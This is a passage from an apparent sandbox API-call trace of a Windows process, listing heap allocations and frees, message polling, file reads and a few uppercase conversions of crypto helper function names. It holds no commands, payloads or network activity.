lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0031.300] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0031.300] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0031.300] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.300] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0031.300] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0031.300] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0031.300] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0031.300] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.300] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0031.300] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0031.300] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.300] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0031.300] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0031.301] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0031.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0031.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0031.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0031.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0031.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0031.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0031.301] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0031.301] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0031.304] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x23c4, lpOverlapped=0x0) returned 1 [0031.304] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0031.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0031.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0031.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x123c4) returned 0x935008 [0031.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0031.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0031.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0031.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0031.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0031.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0031.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x123c4) returned 0x9473d8 [0031.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0031.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.307] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0031.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0031.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x123c4) returned 0x935008 [0031.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0031.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0031.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0031.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.307] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0031.307] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0031.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.308] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0031.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0031.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0031.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0031.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0031.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0031.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x123c4) returned 0x935008 [0031.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0031.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0031.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0031.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0031.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da318 [0031.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0031.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0031.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0031.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da178 [0031.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0031.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0031.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c778 [0031.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0031.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0031.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0031.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0031.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0031.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x123c4) returned 0x8affc0 [0031.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0031.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0031.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0031.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0031.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0031.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0031.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0031.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0031.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0031.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0031.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0031.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0031.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0031.310] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0031.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0031.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0031.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0031.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0031.310] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0031.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0031.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0031.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0031.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0031.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0031.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0031.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0031.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0031.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0031.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0031.311] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0031.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0031.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0031.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3f8 [0031.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0031.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0031.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0031.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0031.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889970 [0031.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0031.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0031.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0031.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0031.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0031.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0031.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0031.311] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0031.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0031.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0031.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0031.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0031.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0031.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0031.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0031.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0031.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0031.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0031.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0031.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0031.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0031.312] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0031.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0031.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0031.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0031.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0031.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0031.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0031.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0031.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0031.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0031.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0031.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0031.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0031.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0031.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0031.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0031.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0031.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0031.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0031.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0031.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0031.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.312] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0031.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0031.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0031.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0031.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0031.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0031.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0031.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0031.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0031.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0031.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0031.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0031.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0031.313] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0031.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0031.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0031.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0031.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0031.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0031.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0031.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0031.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0031.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.314] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0031.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c820 [0031.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0031.314] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0031.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0031.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 